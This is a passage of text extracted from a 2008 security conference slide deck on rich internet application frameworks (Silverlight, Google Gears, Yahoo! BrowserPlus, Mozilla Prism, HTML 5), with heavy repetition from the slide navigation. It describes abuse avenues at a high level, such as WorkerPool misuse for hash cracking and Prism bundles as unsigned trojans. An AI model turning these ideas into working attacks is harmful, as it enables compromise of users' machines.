AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs disconnected Standalone app Privileged OS access Can launch itself

Local data storage Has an installer Raw network sockets Cross-domain XHR Dedicated session management

Can talk to the calling DOM IPC mechanisms Proper SSL security

Microsoft SilverlightWhat is Silverlight?

http://find/

7/29/2019 Ria World Bh 2008

65/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

What is Silverlight?

Cross browser plugin comparable in functionality to Flash

Subset of the .NET framework

Two versions:

Silverlight 1.0: releasedSilverlight 2.0: beta 2

Microsoft SilverlightWhat is Silverlight?

http://find/http://goback/

7/29/2019 Ria World Bh 2008

66/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Silverlight Bits

.XAP .ZIP container for Silverlight apps

XAML Extensible Application Markup LanguageCoreCLR CLR for .NET lite (simplified CAS)

XBAP XAML Browser Applications (CAS)

Managed Controls System.Windows.Forms UserControl

subclasses (CAS)

Microsoft SilverlightXAML

http://find/http://goback/

7/29/2019 Ria World Bh 2008

67/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

B i g g e r C at

S m a l l e r C at

Microsoft SilverlightXAML in Action

http://find/

7/29/2019 Ria World Bh 2008

68/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Microsoft SilverlightSilverlight Security Model

http://find/

7/29/2019 Ria World Bh 2008

69/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Silverlights simplified Code Access Security

SecurityTransparent Silverlight developer code, codesans attribute

SecuritySafeCritical New bridge code from Microsoft

SecurityCritical Slimmed .NET 3

Microsoft SilverlightSilverlight Security Model

http://find/

7/29/2019 Ria World Bh 2008

70/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

This code will fail:u s i n g System . IO ;

F i l e . C r e a t e ( " d u m p s t e r m u f f i n . e x e " ) ;

This code will succeed:

u s i n g System . IO ;

I s o l a t e d S t o r a g e F i l e i s f = I s o l a t e d S t o r a g e F i l e . G e t U s e r S t o r e F o r A p p l i c a t i o n ( ) ;i s f . C r e a t e F i l e ( " r e l a t i v e P a t h " ) ;

This code will also fail:

u s i n g System . IO ;

I s o l a t e d S t o r a g e F i l e i s f = I s o l a t e d S t o r a g e F i l e . G e t U s e r S t o r e F o r A p p l i c a t i o n ( ) ;i s f . C r e a t e F i l e ( " C O M 3 " ) ;

Microsoft SilverlightIsolated Storage

http://find/

7/29/2019 Ria World Bh 2008

71/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Isolated Storage

The default storage quota is 1 MB per application

Storage is isolated per AppDomain

Microsoft SilverlightIsolated Storage

http://find/

7/29/2019 Ria World Bh 2008

72/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

You can deny local storage

Microsoft SilverlightNetwork Sockets

http://find/

7/29/2019 Ria World Bh 2008

73/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Network Sockets

TCP socket connections, limited port range 4502 - 4534

Requires clientaccesspolicy.xml (even to host of origin)

Microsoft SilverlightCross-domain and DOM access

http://find/http://goback/

7/29/2019 Ria World Bh 2008

74/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Crossdomain access and access to hosting DOM can beconfigured:

clientaccesspolicy.xml and crossdomain.xmlApplication manifest

Object parameters passed to plugin

enableHtmlAcess = false (default setting for cross-domain)

Questions about Gears

http://find/http://goback/

7/29/2019 Ria World Bh 2008

75/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs disconnected Standalone app Privileged OS access Can launch itself

Local data storage

Has an installer Raw network sockets Cross-domain XHR Dedicated session management

Can talk to the calling DOM IPC mechanisms Proper SSL security

Google Gears

http://find/http://goback/

7/29/2019 Ria World Bh 2008

76/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS SilverlightGoogle Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Uses a homegrown API for synchronizing data

Local SQLite instance used for data storage

LocalServer hosts content locally for offline access

Works offline via SQL database, local assets, and a localapp server, LocalServer

LocalServer acts as a broker between the browser andwebserver

Changes behavior depending on online status

Implements a WorkerPool to perform intensive Javascriptcalculations outside of the browser

Google Gears

http://find/

7/29/2019 Ria World Bh 2008

77/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Uses a homegrown API for synchronizing data

Local SQLite instance used for data storage

LocalServer hosts content locally for offline access

Works offline via SQL database, local assets, and a localapp server, LocalServer

LocalServer acts as a broker between the browser andwebserver

Changes behavior depending on online status

Implements a WorkerPool to perform intensive Javascriptcalculations outside of the browser

Google Gears

http://find/http://goback/

7/29/2019 Ria World Bh 2008

78/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Uses a homegrown API for synchronizing data

Local SQLite instance used for data storage

LocalServer hosts content locally for offline access

Works offline via SQL database, local assets, and a localapp server, LocalServer

LocalServer acts as a broker between the browser andwebserver

Changes behavior depending on online status

Implements a WorkerPool to perform intensive Javascriptcalculations outside of the browser

Google Gears

http://find/http://goback/

7/29/2019 Ria World Bh 2008

79/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Uses a homegrown API for synchronizing data

Local SQLite instance used for data storage

LocalServer hosts content locally for offline access

Works offline via SQL database, local assets, and a localapp server, LocalServer

LocalServer acts as a broker between the browser andwebserver

Changes behavior depending on online status

Implements a WorkerPool to perform intensive Javascriptcalculations outside of the browser

Google GearsSecurity mechanisms

http://find/

7/29/2019 Ria World Bh 2008

80/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Uses same origin to restrict access to site databases andLocalServer resource capture

Provides for parameterized SQL

Opt-in user dialog

Gears 0.3 allows for customization of this dialog. . .

L h

Google GearsNot a great feature. . .

http://find/

7/29/2019 Ria World Bh 2008

81/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Li i i h

Google GearsWorkerpool abuse

http://find/

7/29/2019 Ria World Bh 2008

82/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Workerpools allow for intensive tasks that would normallytrigger tight loop detection to run uninterrupted

Due to the ease of tricking users into installing Gears apps,makes an attractive target for distributed malicious tasks

Applications for hash cracking, remote site attacks

Li i i the

Google GearsWorkerpool abuse

http://find/http://goback/

7/29/2019 Ria World Bh 2008

83/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Workerpools allow for intensive tasks that would normallytrigger tight loop detection to run uninterrupted

Due to the ease of tricking users into installing Gears apps,makes an attractive target for distributed malicious tasks

Applications for hash cracking, remote site attacks

Living in the

Google GearsWorkerpool abuse

http://find/http://goback/

7/29/2019 Ria World Bh 2008

84/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Workerpools allow for intensive tasks that would normallytrigger tight loop detection to run uninterrupted

Due to the ease of tricking users into installing Gears apps,makes an attractive target for distributed malicious tasks

Applications for hash cracking, remote site attacks

Living in the

Questions about Yahoo! BrowserPlus

http://find/

7/29/2019 Ria World Bh 2008

85/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs disconnected Standalone app Privileged OS access Can launch itself Local data storage Has an installer Raw network sockets Cross-domain XHR Dedicated session management

Can talk to the calling DOM IPC mechanisms Proper SSL security

Living in the

Yahoo! BrowserPlus

A challenger appear

http://find/

7/29/2019 Ria World Bh 2008

86/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Designed to allow for new browser plugins to be easilydeployed and updated

To address security, weve followed the same web security

precedent set by browser developers.But its even worse than that. . .

Initialized by including http://bp.yahooapis.com/2.0.6/browserplus-min.js

No, you cant do that over SSL

Living in the

Yahoo! BrowserPlus

A challenger appear

http://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://find/

7/29/2019 Ria World Bh 2008

87/199

Living in theRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Designed to allow for new browser plugins to be easilydeployed and updated

To address security, weve followed the same web security

precedent set by browser developers.But its even worse than that. . .

Initialized by including http://bp.yahooapis.com/2.0.6/browserplus-min.js

No, you cant do that over SSL

Living in the

Yahoo! BrowserPlus

A challenger appear

http://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://find/

7/29/2019 Ria World Bh 2008

88/199

gRIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Designed to allow for new browser plugins to be easilydeployed and updated

To address security, weve followed the same web security

precedent set by browser developers.But its even worse than that. . .

Initialized by including http://bp.yahooapis.com/2.0.6/browserplus-min.js

No, you cant do that over SSL

Living in the

Yahoo! BrowserPlus

Architecture

http://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://bp.yahooapis.com/2.0.6/browserplus-min.jshttp://find/

7/29/2019 Ria World Bh 2008

89/199

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs as a browser plugin, with a separate helper process

Allows pages to request handy corelets, installedon-demand, like:

Imagemagick for local image processing

Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter

These execute code on the local machine as the currentuser

In short, its ActiveX

Living in the

Yahoo! BrowserPlus

Architecture

http://find/

7/29/2019 Ria World Bh 2008

90/199

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs as a browser plugin, with a separate helper process

Allows pages to request handy corelets, installedon-demand, like:

Imagemagick for local image processing

Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter

These execute code on the local machine as the currentuser

In short, its ActiveX

Living in the

Yahoo! BrowserPlus

Architecture

http://find/http://goback/

7/29/2019 Ria World Bh 2008

91/199

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs as a browser plugin, with a separate helper process

Allows pages to request handy corelets, installedon-demand, like:

Imagemagick for local image processing

Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter

These execute code on the local machine as the currentuser

In short, its ActiveX

Living in theRIA W ld

Yahoo! BrowserPlus

Architecture

http://find/http://goback/

7/29/2019 Ria World Bh 2008

92/199

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs as a browser plugin, with a separate helper process

Allows pages to request handy corelets, installedon-demand, like:

Imagemagick for local image processing

Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter

These execute code on the local machine as the currentuser

In short, its ActiveX

Living in theRIA W ld

Yahoo! BrowserPlus

Architecture

http://find/

7/29/2019 Ria World Bh 2008

93/199

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs as a browser plugin, with a separate helper process

Allows pages to request handy corelets, installedon-demand, like:

Imagemagick for local image processing

Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter

These execute code on the local machine as the currentuser

In short, its ActiveX

Living in theRIA World

Yahoo! BrowserPlus

Architecture

http://find/http://goback/

7/29/2019 Ria World Bh 2008

94/199

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs as a browser plugin, with a separate helper process

Allows pages to request handy corelets, installedon-demand, like:

Imagemagick for local image processing

Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter

These execute code on the local machine as the currentuser

In short, its ActiveX

Living in theRIA World

Yahoo! BrowserPlus

Architecture

http://find/

7/29/2019 Ria World Bh 2008

95/199

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs as a browser plugin, with a separate helper process

Allows pages to request handy corelets, installedon-demand, like:

Imagemagick for local image processing

Flickr uploadrNotifications via Growl/Snarland a Ruby interpreter

These execute code on the local machine as the currentuser

In short, its ActiveX

Living in theRIA World

Yahoo! BrowserPlus

About this Ruby business. . .

http://find/http://goback/

7/29/2019 Ria World Bh 2008

96/199

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Included version: 1.8.6p0

Perfectly safe, as long as you dont use strings or arrays

Living in theRIA World

Yahoo! BrowserPlus

About this Ruby business. . .

http://find/http://goback/

7/29/2019 Ria World Bh 2008

97/199

RIA World

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Included version: 1.8.6p0

Perfectly safe, as long as you dont use strings or arrays

Living in theRIA World

Yahoo! BrowserPlus

Beating up old ladies

http://find/

7/29/2019 Ria World Bh 2008

98/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Of course, BrowserPlus

isnt totally baked yetIn Sneak Peek phase

Currently, only works with Yahoo! sites

All modules must be signed by Yahoo!

But this has to change before it can be widely adoptedAlso lacks some polish. . .

A d e s c r i p t i o n o f t h e c om pon en nt o og a b oo ga momma b i t e me y ea h y ea h y ea h .

Actual Yahoo! content

Living in theRIA World

Yahoo! BrowserPlus

Summary

http://find/

7/29/2019 Ria World Bh 2008

99/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

This is a very dangerous idea.

Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.

All runs as a browser plugin rather than an extension or

control: full privilege.

Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)

Bad code can supposedly be revoked, but it can override

revocation mechanisms.Bottom line unsafe at any speed.

Living in theRIA World

Yahoo! BrowserPlus

Summary

http://find/

7/29/2019 Ria World Bh 2008

100/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

This is a very dangerous idea.

Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.

All runs as a browser plugin rather than an extension or

control: full privilege.

Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)

Bad code can supposedly be revoked, but it can override

revocation mechanisms.Bottom line unsafe at any speed.

Living in theRIA World

Yahoo! BrowserPlus

Summary

http://find/http://goback/

7/29/2019 Ria World Bh 2008

101/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

This is a very dangerous idea.

Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.

All runs as a browser plugin rather than an extension or

control: full privilege.

Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)

Bad code can supposedly be revoked, but it can override

revocation mechanisms.Bottom line unsafe at any speed.

Living in theRIA World

Yahoo! BrowserPlus

Summary

http://find/

7/29/2019 Ria World Bh 2008

102/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

This is a very dangerous idea.

Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.

All runs as a browser plugin rather than an extension or

control: full privilege.

Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)

Bad code can supposedly be revoked, but it can override

revocation mechanisms.Bottom line unsafe at any speed.

Living in theRIA World

Yahoo! BrowserPlus

Summary

http://find/

7/29/2019 Ria World Bh 2008

103/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

This is a very dangerous idea.

Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.

All runs as a browser plugin rather than an extension or

control: full privilege.

Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)

Bad code can supposedly be revoked, but it can override

revocation mechanisms.Bottom line unsafe at any speed.

Living in theRIA World

Yahoo! BrowserPlus

Summary

http://find/

7/29/2019 Ria World Bh 2008

104/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

This is a very dangerous idea.

Allows for buggy native code apps of any type to bedeployed with no sandboxing or sitelocking.

All runs as a browser plugin rather than an extension or

control: full privilege.

Corelets are signed, but can overwrite each other aftersignature verification (and be updated dynamically)

Bad code can supposedly be revoked, but it can override

revocation mechanisms.Bottom line unsafe at any speed.

Living in theRIA World

Mozilla PrismQuick Summary

http://find/

7/29/2019 Ria World Bh 2008

105/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Runs disconnected Standalone app Privileged OS access Can launch itself Local data storage

Has an installer Raw network sockets Cross-domain XHR Dedicated session management

Can talk to the calling DOM

IPC mechanisms Proper SSL security

Living in theRIA World

Mozilla Prism

http://find/

7/29/2019 Ria World Bh 2008

106/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Formerly WebRunner wraps webapps to appear asdesktop apps

Standalone browser instance, restricted to one domainExternal links open a regular browser

Separate user profile

Certificate errors are a hard failure

Living in theRIA World

Mozilla Prism

http://find/

7/29/2019 Ria World Bh 2008

107/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Consists of a webapp bundle with id, URI, CSS, scriptingand UI rules in an INI:

[ P a r a m e t e r s ]i d=i s e c . s i t e @ i s e c p a r t n e r s . comu r i=h t t p s : / /www . i s e c p a r t n e r s . com/i c o n=i s e cs t a t u s=nol o c a t i o n=nos i d e b a r=non a v i g a t i o n=no

Living in theRIA World

Mozilla PrismExample bundles

http://find/

7/29/2019 Ria World Bh 2008

108/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Living in theRIA World

Mozilla PrismBundles

http://find/

7/29/2019 Ria World Bh 2008

109/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Javascript included with webapp bundles has full XPCOMprivs (but not content scripting privs)

Script in 3rd-party bundles allows modifying browserbehavior just like an extension

Unlike add-ons, no mechanism for signing or verifyinggoodness of webapp bundles

Living in theRIA World

Mozilla PrismBundles

http://find/

7/29/2019 Ria World Bh 2008

110/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Javascript included with webapp bundles has full XPCOMprivs (but not content scripting privs)

Script in 3rd-party bundles allows modifying browserbehavior just like an extension

Unlike add-ons, no mechanism for signing or verifyinggoodness of webapp bundles

Living in theRIA World

Mozilla PrismBundles

http://find/

7/29/2019 Ria World Bh 2008

111/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Javascript included with webapp bundles has full XPCOMprivs (but not content scripting privs)

Script in 3rd-party bundles allows modifying browserbehavior just like an extension

Unlike add-ons, no mechanism for signing or verifyinggoodness of webapp bundles

Living in theRIA World

Mozilla PrismPrism Install UI

http://find/

7/29/2019 Ria World Bh 2008

112/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Living in theRIA World

Mozilla PrismAbuse

http://find/

7/29/2019 Ria World Bh 2008

113/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Looks like a bookmark dialog

No warnings for install

Full XPCOM scripting privileges

Low bar for trojans and malicious code a maliciousbrowser extension, but with no code signing or warning

Living in theRIA World

Mozilla PrismAbuse

http://find/

7/29/2019 Ria World Bh 2008

114/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Looks like a bookmark dialog

No warnings for install

Full XPCOM scripting privileges

Low bar for trojans and malicious code a maliciousbrowser extension, but with no code signing or warning

Living in theRIA World

Mozilla PrismAbuse

http://find/

7/29/2019 Ria World Bh 2008

115/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Looks like a bookmark dialog

No warnings for install

Full XPCOM scripting privileges

Low bar for trojans and malicious code a maliciousbrowser extension, but with no code signing or warning

Living in theRIA World

Mozilla PrismAbuse

http://find/http://goback/

7/29/2019 Ria World Bh 2008

116/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

Looks like a bookmark dialog

No warnings for install

Full XPCOM scripting privileges

Low bar for trojans and malicious code a maliciousbrowser extension, but with no code signing or warning

Living in theRIA World

HTML 5New features in Firefox and WebKit

http://find/

7/29/2019 Ria World Bh 2008

117/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google GearsY! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

The standards-based approach

Introduces DOM storage sessionStorage andlocalStorage

sessionStorage stores arbitrary amounts of data for a singlesessionlocalStorage persists beyond the session never expires,limited to 5M

Database storage via openDatabase()

All expected to be same-origin

Living in theRIA World

HTML 5New features in Firefox and WebKit

http://find/

7/29/2019 Ria World Bh 2008

118/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

The standards-based approach

Introduces DOM storage sessionStorage andlocalStorage

sessionStorage stores arbitrary amounts of data for a singlesessionlocalStorage persists beyond the session never expires,limited to 5M

Database storage via openDatabase()

All expected to be same-origin

Living in theRIA World

HTML 5New features in Firefox and WebKit

http://find/

7/29/2019 Ria World Bh 2008

119/199

Introduction

Who are we?

Whats a RIA?

Why use RIA?

Frameworks

Adobe AIR

MS Silverlight

Google Gears

Y! BrowserPlus

Mozilla Prism

HTML 5

AttackScenarios

RIA vs OS

RIA vs the web

RIA vs RIA

The standards-based approach

Introduces DOM storage sessionStorage andlocalStorage

sessionStorage stores arbitrary amounts of data for a single

